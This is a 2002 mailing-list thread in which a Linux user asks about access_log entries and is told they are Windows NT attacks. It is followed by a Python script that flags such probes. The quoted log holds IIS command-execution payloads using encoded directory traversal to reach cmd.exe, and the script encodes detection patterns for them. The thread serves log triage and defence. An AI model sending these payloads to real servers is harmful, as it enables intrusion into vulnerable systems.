access_log
epsas at inflicted.net
Mon Jan 28 13:44:26 PST 2002
These are Windows NT attacks, which shouldn't affect you if you run Linux.
Why are the IPs dashed out? "24.--.--.--7" Is that your handiwork?
Good luck,
Charles
On Mon, Jan 28, 2002 at 11:00:59AM -1000, Todd Lee wrote:
> Hey everyone,
>
> I was wondering if anyone out there could help me with understanding my
> access_log for httpd. I was looking through it after setting a new RH7.2
> box with monmotha's firewall script and the latest rpms from RHN. I just
> host my band's website and e-mail. Anyway, I got these entries that I don't
> quite understand. It looks like someone was trying to run something on the
> box, just wondering how to interpret these. I changed the IP...just in case
> I'm wrong and this is totally innocent, hate to give out people's IPs
> unnecessarily...
> 24.--.--.--7 - - [28/Jan/2002:05:00:43 -1000] "GET /scripts/root.exe?/c+dir
> HTTP/1.0" 404 317
> 24.--.--.--7 - - [28/Jan/2002:05:01:02 -1000] "GET /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 315
> 24.--.--.--7 - - [28/Jan/2002:05:01:29 -1000] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
> 24.--.--.--7 - - [28/Jan/2002:05:01:48 -1000] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
> 24.--.--.--7 - - [28/Jan/2002:05:02:06 -1000] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
> 24.--.--.--7 - - [28/Jan/2002:05:02:25 -1000] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 356
> 24.--.-.--7 - - [28/Jan/2002:05:02:47 -1000] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 356
> 24.--.-.--7 - - [28/Jan/2002:05:03:27 -1000] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
> stem32/cmd.exe?/c+dir HTTP/1.0" 404 372
> 24.--.--.--7 - - [28/Jan/2002:05:03:46 -1000] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
> 24.--.--.--7 - - [28/Jan/2002:05:03:47 -1000] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
> 24.--.--.--7 - - [28/Jan/2002:05:04:06 -1000] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
> 24.--.--.--7 - - [28/Jan/2002:05:04:27 -1000] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
> 24.--.--.--7 - - [28/Jan/2002:05:04:31 -1000] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 322
> 24.--.--.--7 - - [28/Jan/2002:05:04:35 -1000] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 322
> 24.--.--.--7 - - [28/Jan/2002:05:04:54 -1000] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
> 24.---.--.--7 - - [28/Jan/2002:05:05:12 -1000] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
>
> Thanks!
> -Todd
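One way to triage entries like the ones quoted above, as an added example that is not part of the original thread: it percent-decodes each request path until it stops changing, then tags double encoding, overlong UTF-8 bytes, directory traversal and Windows shell targets, and records whether the server answered with anything other than an error. The function names, tag names and sample lines are assumptions made for this sketch; the sample entries are constructed from the quoted log, joined onto one line each, with documentation-range client addresses.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample: entries modelled on the quoted log, one per line,
# with documentation-range client addresses (192.0.2.0/24).
SAMPLE_LOG = """\
192.0.2.7 - - [28/Jan/2002:05:00:43 -1000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 317
192.0.2.7 - - [28/Jan/2002:05:02:06 -1000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
192.0.2.7 - - [28/Jan/2002:05:04:06 -1000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
192.0.2.7 - - [28/Jan/2002:05:04:31 -1000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 322
192.0.2.9 - - [28/Jan/2002:06:10:00 -1000] "GET /band/gigs.html HTTP/1.0" 200 5120
"""

# Common log format: host ident user [time] "method target proto" status size
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) \S+$')

def classify(target):
    """Return tags describing why a request target looks like an IIS probe."""
    path = target.split("?", 1)[0].encode("latin-1", "replace")
    rounds = 0
    while rounds < 5:                       # decode until stable, bounded
        decoded = unquote_to_bytes(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    tags = set()
    if rounds > 1:                          # e.g. %255c -> %5c -> backslash
        tags.add("double-encoded")
    if b"\xc0" in path or b"\xc1" in path:  # bytes never valid in UTF-8
        tags.add("overlong-utf8")
    norm = path.replace(b"\\", b"/").lower()
    if b"../" in norm:
        tags.add("traversal")
    if norm.endswith((b"/cmd.exe", b"/root.exe")):
        tags.add("windows-shell")
    return tags

def scan(log_text):
    """Return (client, status, target, tags, answered) for suspicious entries."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        tags = classify(target)
        if tags:
            # A 2xx/3xx answer would mean the server served the request.
            hits.append((client, status, target, sorted(tags), status < 400))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Every flagged entry in the sample carries a 400 or 404 status, so the last field is False for all of them; an entry where it is True is the one to investigate first.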